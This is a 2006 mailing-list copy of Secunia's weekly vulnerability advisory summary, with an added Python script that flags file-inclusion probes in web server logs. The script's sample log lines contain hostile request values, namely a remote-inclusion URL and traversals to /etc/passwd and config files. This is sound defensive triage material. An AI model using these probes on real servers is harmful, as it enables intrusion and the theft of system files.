[ISN] Secunia Weekly Summary - Issue: 2006-16

From: InfoSec News (isn@private)
Date: Fri Apr 21 2006 - 02:49:54 PDT


========================================================================

                  The Secunia Weekly Advisory Summary                  
                        2006-04-13 - 2006-04-20                        

                       This week: 80 advisories                        

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3..............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff works every day to make Secunia the best and most
reliable source of vulnerability information. Every single
vulnerability report is validated and verified before a Secunia
advisory is written.

Secunia validates and verifies vulnerability reports in several
different ways, e.g. by downloading the software and performing
comprehensive tests, by reviewing source code, or by assessing the
credibility of the source that issued the vulnerability report.

As a result, Secunia's database is the most accurate and complete
source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

21 vulnerabilities have been reported in Firefox, which can be
exploited by malicious people to conduct cross-site scripting and
phishing attacks, bypass certain security restrictions, disclose
sensitive information, and potentially compromise a user's system.

A number of these vulnerabilities have apparently been fixed in the
Firefox 1.5 branch since October 2005 but were only fixed in the 1.0
branch with the release of version 1.0.8.

Many of these vulnerabilities also affect the Mozilla Suite and have
not yet been patched.

Reference:
http://secunia.com/SA19631
http://secunia.com/SA18703

 --

Multiple vulnerabilities have been reported in various Oracle
products. Some have an unknown impact, and others can be exploited to
conduct SQL injection attacks or compromise a vulnerable system.

This advisory currently has a status of "partial fix" because patches
for one of the vulnerabilities are not yet available for all affected
products.

Reference:
http://secunia.com/SA19712

 --

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA19631] Firefox Multiple Vulnerabilities
2.  [SA19521] Internet Explorer Window Loading Race Condition Address
              Bar Spoofing
3.  [SA18680] Microsoft Internet Explorer "createTextRange()" Code
              Execution
4.  [SA19698] Firefox "View Image" Local Resource Linking Weakness
5.  [SA19649] Mozilla SeaMonkey Multiple Vulnerabilities
6.  [SA19644] Ubuntu Updates for Multiple Packages
7.  [SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability
8.  [SA19642] Sphider "settings_dir" File Inclusion Vulnerability
9.  [SA19653] PAJAX Arbitrary Code Execution Vulnerabilities
10. [SA19663] Novell GroupWise Messenger Accept-Language Buffer
              Overflow

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA19662] Web+Shop "storeid" Full Path Disclosure Weakness

UNIX/Linux:
[SA19746] Ubuntu update for firefox
[SA19729] Red Hat update for mozilla
[SA19714] Fedora update for firefox
[SA19696] Red Hat update for firefox
[SA19692] Debian update for horde2
[SA19690] Sysinfoscript sysinfo.cgi Shell Command Injection and Path
Disclosure
[SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability
[SA19671] Xine Playlist File Path Format String Vulnerability
[SA19707] xFlow Multiple Vulnerabilities
[SA19694] PHP Net Tools "host" Shell Command Injection Vulnerability
[SA19691] Gentoo update for cacti
[SA19674] Empire Server Unspecified Vulnerabilities
[SA19718] BannerFarm banners.cgi Cross-Site Scripting Vulnerability
[SA19667] CommuniMail Multiple Cross-Site Scripting Vulnerabilities
[SA19658] Gentoo update for libapreq2
[SA19735] Fedora update for kernel
[SA19683] avast! Insecure Temporary File Creation
[SA19682] Symantec LiveUpdate for Macintosh Privilege Escalation
[SA19675] Debian update for fcheck
[SA19664] Linux Kernel Shared Memory Restrictions Bypass
[SA19657] Linux Kernel Shared Memory Restrictions Bypass
[SA19656] IBM AIX rm_mlcache_file Arbitrary File Overwrite
[SA19724] Linux Kernel x87 Register Information Leak
[SA19716] Avaya CMS / IR "/proc" Denial of Service
[SA19715] FreeBSD FPU x87 Register Information Leak
[SA19709] Linux Kernel "ip_route_input()" Denial of Service
Vulnerability
[SA19687] Debian update for bsdgames

Other:
[SA19740] Cisco IOS XR MPLS Denial of Service Vulnerabilities

Cross Platform:
[SA19743] ActualAnalyzer "rf" File Inclusion Vulnerability
[SA19730] TotalCalendar "inc_dir" File Inclusion Vulnerability
[SA19728] RechnungsZentrale V2 Multiple Vulnerabilities
[SA19726] Internet Photoshow "page" File Inclusion Vulnerability
[SA19712] Oracle Products Multiple Vulnerabilities
[SA19688] Monster Top List File Inclusion and Cross-Site Scripting
Vulnerabilities
[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion
Vulnerability
[SA19680] myEvent Multiple Vulnerabilities
[SA19670] Amaya Attribute Value Buffer Overflow Vulnerabilities
[SA19666] Censtore "page" Shell Command Injection Vulnerability
[SA19653] PAJAX Arbitrary Code Execution Vulnerabilities
[SA19649] Mozilla SeaMonkey Multiple Vulnerabilities
[SA19719] LinPHA Cross-Site Scripting and SQL Injection
Vulnerabilities
[SA19706] phpWebFTP "language" Local File Inclusion
[SA19705] phpGraphy "editwelcome" Authentication Bypass
[SA19703] Neuron Blog Multiple Vulnerabilities
[SA19700] betaboard "FormVal_profile" Profile Script Insertion
[SA19699] LifeType ADOdb "server.php" Insecure Test Script Security
Issue
[SA19697] warforge.NEWS Multiple Vulnerabilities
[SA19689] PowerClan "memberid" SQL Injection Vulnerability
[SA19678] Black Orpheus ClanMemberSkript "userID" SQL Injection
[SA19677] Fuju News Authentication Bypass and SQL Injection
[SA19672] Musicbox Script Insertion and SQL Injection Vulnerabilities
[SA19669] Dubelu PhpGuestbook Comment Script Insertion Vulnerability
[SA19668] MyBB Cross-Site Scripting and Variable Manipulation
Vulnerabilities
[SA19665] Coppermine Photo Gallery "file" Local File Inclusion
Vulnerability
[SA19661] PHP Album "data_dir" File Inclusion Vulnerability
[SA19650] Article Publisher Pro SQL Injection Vulnerabilities
[SA19647] phpWebSite "hub_dir" Local File Inclusion Vulnerability
[SA19645] MODx Cross-Site Scripting and Directory Traversal
[SA19663] Novell GroupWise Messenger Accept-Language Buffer Overflow
[SA19725] AWStats "config" Cross-Site Scripting and Full Path
Disclosure
[SA19720] Plexum X5 "plexum.php" SQL Injection Vulnerability
[SA19711] bMachine Search Feature Cross-Site Scripting
[SA19710] Calendarix "ycyear" Cross-Site Scripting Vulnerability
[SA19704] ShoutBOOK Multiple Script Insertion Vulnerabilities
[SA19701] IntelliLink Pro Multiple Cross-Site Scripting
Vulnerabilities
[SA19695] KCScripts Portal Pack Multiple Cross-Site Scripting
Vulnerabilities
[SA19685] PMTool "order" SQL Injection Vulnerabilities
[SA19681] planetSearch+ "search_exp" Cross-Site Scripting
Vulnerability
[SA19679] LinPHA Cross-Site Scripting Vulnerabilities
[SA19673] Bitweaver "error" Cross-Site Scripting Vulnerability
[SA19660] TinyWebGallery "twg_album" Cross-Site Scripting
Vulnerability
[SA19659] phpMyAdmin "sql_query" Cross-Site Scripting and SQL Code
Execution
[SA19655] Visale Cross-Site Scripting Vulnerabilities
[SA19654] Boardsolution "keyword" Cross-Site Scripting Vulnerability
[SA19652] phpFaber TopSites "page" Cross-Site Scripting Vulnerability
[SA19651] Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities
[SA19648] FarsiNews "selected_search_arch" Cross-Site Scripting
[SA19646] LifeType Template "show" Cross-Site Scripting Vulnerability
[SA19698] Firefox "View Image" Local Resource Linking Weakness
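
Nine of this week's advisories (SA19743 "rf", SA19730 "inc_dir",
SA19726 "page", SA19684 "include_path", SA19661 "data_dir", SA19647
"hub_dir", SA19665 "file", SA19706 "language" and SA19642
"settings_dir") are file inclusion issues keyed on a single request
parameter. The Python script below is an added example for readers who
want to triage their own web server logs against that batch; it is not
part of the Secunia summary and not code from any of the listed
products. It reads Apache combined-format access log lines and flags
those parameter names when the value carries a remote URL, a ".."
traversal sequence or a null byte. The log lines, addresses and paths
are constructed for the example, and the list of URL schemes is an
assumption about what PHP's include() will fetch. A hit only means
someone probed for the pattern; it says nothing about whether the
target actually runs a vulnerable version.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names called out in this week's file inclusion advisories:
# SA19743 rf, SA19730 inc_dir, SA19726 page, SA19684 include_path,
# SA19661 data_dir, SA19647 hub_dir, SA19665 file, SA19706 language,
# SA19642 settings_dir. "page" and "file" are generic names and will be
# noisy on sites that use them legitimately.
INCLUSION_PARAMS = {
    "rf", "inc_dir", "page", "include_path", "data_dir",
    "hub_dir", "file", "language", "settings_dir",
}

# Indicators checked against a percent-decoded parameter value. The
# scheme list is an assumption (wrappers include() fetches when
# allow_url_fopen is on); extend it for your environment.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?|php|data)://", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.[/\\]")

# Apache/NCSA combined log format; only client IP, request target and
# status are extracted.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)


def classify_value(value):
    """Return a sorted tuple of indicator labels for one decoded value."""
    hits = []
    if REMOTE_SCHEME.search(value):
        hits.append("remote-inclusion")
    if "\x00" in value:
        hits.append("null-byte-truncation")
    if TRAVERSAL.search(value):
        hits.append("local-traversal")
    return tuple(sorted(hits))


def scan_line(line):
    """Return (ip, param, indicators, value) findings for one log line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl percent-decodes names and values, so %2e%2e%2f and %00
    # already arrive here as "../" and "\x00".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INCLUSION_PARAMS:
            continue
        indicators = classify_value(value)
        if indicators:
            findings.append((m.group("ip"), name, indicators, value))
    return findings


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


# Constructed sample lines (RFC 5737 documentation addresses, made-up
# paths); they are not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2006:10:12:01 +0200] "GET /cal/index.php?inc_dir=http://203.0.113.5/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [18/Apr/2006:10:12:07 +0200] "GET /gallery/index.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [18/Apr/2006:10:13:44 +0200] "GET /cal/index.php?inc_dir=themes/default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [18/Apr/2006:10:14:02 +0200] "GET /stats/awstats.pl?config=..%2f..%2fetc%2fpasswd HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.14 - - [18/Apr/2006:10:15:30 +0200] "GET /ftp/index.php?language=..%2f..%2fconfig.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, name, indicators, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {name}={value!r} -> {', '.join(indicators)}")
```

Run against the constructed sample, the script flags the remote
inclusion attempt on "inc_dir", the traversal plus null-byte probe on
"file" and the encoded traversal on "language"; the legitimate
"inc_dir=themes/default" request and the traversal on AWStats'
"config" parameter (an XSS issue this week, not file inclusion) are
left alone because the check is scoped to the listed parameter names.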

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA19662] Web+Shop "storeid" Full Path Disclosure Weakness

Critical:    Not critical
Where:       From remote
Impact:      Exposure of system information
Released:    2006-04-14

Revnic Vasile has reported a weakness in Web+Shop, which can be
exploited by malicious people to disclose system information.

Full Advisory:
http://secunia.com/advisories/19662/


UNIX/Linux:--

[SA19746] Ubuntu update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released:    2006-04-20

Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service), conduct cross-site scripting and phishing
attacks, bypass certain security restrictions, disclose sensitive
information, and potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19746/

 --

[SA19729] Red Hat update for mozilla

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released:    2006-04-19

Red Hat has issued an update for mozilla. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19729/

 --

[SA19714] Fedora update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released:    2006-04-19

Fedora has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19714/

 --

[SA19696] Red Hat update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released:    2006-04-17

Red Hat has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19696/

 --

[SA19692] Debian update for horde2

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of sensitive information, System access
Released:    2006-04-17

Debian has issued an update for horde2. This fixes two vulnerabilities,
which can be exploited by malicious people to disclose sensitive
information and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19692/

 --

[SA19690] Sysinfoscript sysinfo.cgi Shell Command Injection and Path
Disclosure

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of system information, System access
Released:    2006-04-17

rgod has reported a vulnerability and a weakness in Sysinfoscript,
which can be exploited by malicious people to disclose system
information or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19690/

 --

[SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-14

Avaya has acknowledged a vulnerability in Avaya CMS and Avaya IR, which
can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19676/

 --

[SA19671] Xine Playlist File Path Format String Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-19

c0ntex has reported a vulnerability in xine-ui, which potentially can
be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19671/

 --

[SA19707] xFlow Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-04-19

r0t has reported multiple vulnerabilities in xFlow, which can be
exploited by malicious users to conduct SQL injection attacks and by
malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19707/

 --

[SA19694] PHP Net Tools "host" Shell Command Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-04-19

FOX_MULDER has discovered a vulnerability in PHP Net Tools, which
potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/19694/

 --

[SA19691] Gentoo update for cacti

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Manipulation of
data, Exposure of system information, System access
Released:    2006-04-17

Gentoo has issued an update for cacti. This fixes two security issues
and some vulnerabilities, which can be exploited by malicious people to
disclose system information, conduct cross-site scripting attacks,
execute arbitrary SQL code, and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/19691/

 --

[SA19674] Empire Server Unspecified Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Unknown
Released:    2006-04-18

Some vulnerabilities with unknown impacts have been reported in Empire
Server.

Full Advisory:
http://secunia.com/advisories/19674/

 --

[SA19718] BannerFarm banners.cgi Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

r0t has reported a vulnerability in BannerFarm, which can be exploited
by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19718/

 --

[SA19667] CommuniMail Multiple Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

r0t has reported some vulnerabilities in CommuniMail, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19667/

 --

[SA19658] Gentoo update for libapreq2

Critical:    Less critical
Where:       From remote
Impact:      DoS
Released:    2006-04-18

Gentoo has issued an update for libapreq2. This fixes a vulnerability,
which potentially can be exploited by malicious people to cause a DoS
(Denial of Service).

Full Advisory:
http://secunia.com/advisories/19658/

 --

[SA19735] Fedora update for kernel

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass, Exposure of sensitive information, DoS
Released:    2006-04-20

Fedora has issued an update for the kernel. This fixes some
vulnerabilities, which can be exploited by malicious, local users to
cause a DoS (Denial of Service), gain knowledge of potentially
sensitive information, or bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/19735/

 --

[SA19683] avast! Insecure Temporary File Creation

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-04-18

Julian L. has reported a vulnerability in avast! Linux Home Edition,
which can be exploited by malicious, local users to perform certain
actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/19683/

 --

[SA19682] Symantec LiveUpdate for Macintosh Privilege Escalation

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-04-18

A vulnerability has been reported in Symantec LiveUpdate for
Macintosh, which can be exploited by malicious, local users to gain
escalated privileges.

Full Advisory:
http://secunia.com/advisories/19682/

 --

[SA19675] Debian update for fcheck

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-04-17

Debian has issued an update for fcheck. This fixes a vulnerability,
which can be exploited by malicious, local users to perform certain
actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/19675/

 --

[SA19664] Linux Kernel Shared Memory Restrictions Bypass

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-04-19

A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/19664/

 --

[SA19657] Linux Kernel Shared Memory Restrictions Bypass

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-04-19

A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/19657/

 --

[SA19656] IBM AIX rm_mlcache_file Arbitrary File Overwrite

Critical:    Less critical
Where:       Local system
Impact:      Manipulation of data
Released:    2006-04-18

A vulnerability has been reported in AIX, which can be exploited by
malicious, local users to perform certain actions with escalated
privileges.

Full Advisory:
http://secunia.com/advisories/19656/

 --

[SA19724] Linux Kernel x87 Register Information Leak

Critical:    Not critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-04-19

A security issue has been reported in Linux Kernel, which can be
exploited by malicious, local users to gain knowledge of potentially
sensitive information.

Full Advisory:
http://secunia.com/advisories/19724/

 --

[SA19716] Avaya CMS / IR "/proc" Denial of Service

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-04-18

Avaya has acknowledged a vulnerability in Avaya CMS and Avaya IR, which
can be exploited by malicious, local users to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/19716/

 --

[SA19715] FreeBSD FPU x87 Register Information Leak

Critical:    Not critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-04-19

A security issue has been reported in FreeBSD, which can be exploited
by malicious, local users to gain knowledge of potentially sensitive
information.

Full Advisory:
http://secunia.com/advisories/19715/

 --

[SA19709] Linux Kernel "ip_route_input()" Denial of Service
Vulnerability

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-04-19

A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/19709/

 --

[SA19687] Debian update for bsdgames

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-04-17

Debian has issued an update for bsdgames. This fixes a vulnerability,
which can be exploited by malicious, local users to gain escalated
privileges.

Full Advisory:
http://secunia.com/advisories/19687/


Other:--

[SA19740] Cisco IOS XR MPLS Denial of Service Vulnerabilities

Critical:    Less critical
Where:       From local network
Impact:      DoS
Released:    2006-04-20

Three vulnerabilities have been reported in Cisco IOS XR, which can be
exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/19740/


Cross Platform:--

[SA19743] ActualAnalyzer "rf" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-20

Aesthetico has reported a vulnerability in ActualAnalyzer, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19743/

 --

[SA19730] TotalCalendar "inc_dir" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-19

VietMafia has reported a vulnerability in TotalCalendar, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19730/

 --

[SA19728] RechnungsZentrale V2 Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2006-04-19

GroundZero Security Research has discovered some vulnerabilities in
RechnungsZentrale V2, which can be exploited by malicious people to
conduct SQL injection attacks and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19728/

 --

[SA19726] Internet Photoshow "page" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-19

Hessam-x has discovered a vulnerability in Internet Photoshow, which
can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/19726/

 --

[SA19712] Oracle Products Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Unknown, Manipulation of data, System access
Released:    2006-04-19

Multiple vulnerabilities have been reported in various Oracle products.
Some have an unknown impact, and others can be exploited to conduct SQL
injection attacks or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19712/

 --

[SA19688] Monster Top List File Inclusion and Cross-Site Scripting
Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, System access
Released:    2006-04-17

Two vulnerabilities have been reported in Monster Top List, which can
be exploited by malicious people to conduct cross-site scripting
attacks and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19688/

 --

[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion
Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-20

VietMafia has reported a vulnerability in I-Rater Platinum, which can
be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19684/

 --

[SA19680] myEvent Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data, System access
Released:    2006-04-18

Some vulnerabilities have been discovered in myEvent, which can be
exploited by malicious users to conduct script insertion and SQL
injection attacks, and by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/19680/

 --

[SA19670] Amaya Attribute Value Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-14

Thomas Waldegger has discovered two vulnerabilities in Amaya, which can
be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/19670/

 --

[SA19666] Censtore "page" Shell Command Injection Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-17

FOX_MULDER has reported a vulnerability in Censtore, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19666/

 --

[SA19653] PAJAX Arbitrary Code Execution Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-04-14

RedTeam has reported two vulnerabilities in PAJAX, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19653/

 --

[SA19649] Mozilla SeaMonkey Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Exposure of sensitive information, System
access
Released:    2006-04-14

Multiple vulnerabilities have been reported in Mozilla SeaMonkey, which
can be exploited by malicious people to bypass certain security
restrictions, disclose sensitive information, and compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/19649/

 --

[SA19719] LinPHA Cross-Site Scripting and SQL Injection
Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-04-19

Some vulnerabilities have been reported in LinPHA, which can be
exploited by malicious people to conduct cross-site scripting and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/19719/

 --

[SA19706] phpWebFTP "language" Local File Inclusion

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-04-18

arko.dhar has discovered a vulnerability in phpWebFTP, which can be
exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/19706/

 --

[SA19705] phpGraphy "editwelcome" Authentication Bypass

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-04-18

rgod has discovered a vulnerability in phpGraphy, which can be
exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/19705/

 --

[SA19703] Neuron Blog Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-04-19

Some vulnerabilities have been discovered in Neuron Blog, which can be
exploited by malicious people to conduct script insertion attacks and
SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19703/

 --

[SA19700] betaboard "FormVal_profile" Profile Script Insertion

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-18

Simon MOREL has reported a vulnerability in betaboard, which can be
exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/19700/

 --

[SA19699] LifeType ADOdb "server.php" Insecure Test Script Security
Issue

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, System access
Released:    2006-04-19

A security issue has been discovered in LifeType, which can be
exploited by malicious people to execute arbitrary SQL code and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19699/

 --

[SA19697] warforge.NEWS Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-04-19

Some vulnerabilities have been discovered in warforge.NEWS, which can
be exploited by malicious users to conduct script insertion attacks,
and by malicious people to conduct script insertion attacks and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/19697/

 --

[SA19689] PowerClan "memberid" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-04-17

d4igoro has reported a vulnerability in PowerClan, which can be
exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19689/

 --

[SA19678] Black Orpheus ClanMemberSkript "userID" SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-04-19

snatcher has discovered a vulnerability in Black Orpheus
ClanMemberSkript, which can be exploited by malicious people to conduct
SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19678/

 --

[SA19677] Fuju News Authentication Bypass and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Manipulation of data
Released:    2006-04-17

snatcher has reported two vulnerabilities in Fuju News, which can be
exploited by malicious people to bypass certain security restrictions
and conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19677/

 --

[SA19672] Musicbox Script Insertion and SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-04-17

r0t has reported some vulnerabilities in Musicbox, which can be
exploited by malicious people to conduct script insertion and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/19672/

 --

[SA19669] Dubelu PhpGuestbook Comment Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

r0t has discovered a vulnerability in Dubelu PhpGuestbook, which can be
exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/19669/

 --

[SA19668] MyBB Cross-Site Scripting and Variable Manipulation
Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Manipulation of
data
Released:    2006-04-18

Two vulnerabilities have been reported in MyBB, which can be exploited
by malicious people to conduct cross-site scripting and SQL injection
attacks, and manipulate certain information.

Full Advisory:
http://secunia.com/advisories/19668/

 --

[SA19665] Coppermine Photo Gallery "file" Local File Inclusion
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-04-19

imei addmimistrator has discovered a vulnerability in Coppermine Photo
Gallery, which can be exploited by malicious people to disclose
sensitive information.

Full Advisory:
http://secunia.com/advisories/19665/

 --

[SA19661] PHP Album "data_dir" File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-04-18

rgod has discovered a vulnerability in PHP Album, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19661/

 --

[SA19650] Article Publisher Pro SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-04-19

Two vulnerabilities have been reported in Article Publisher Pro, which
can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19650/

 --

[SA19647] phpWebSite "hub_dir" Local File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, System access
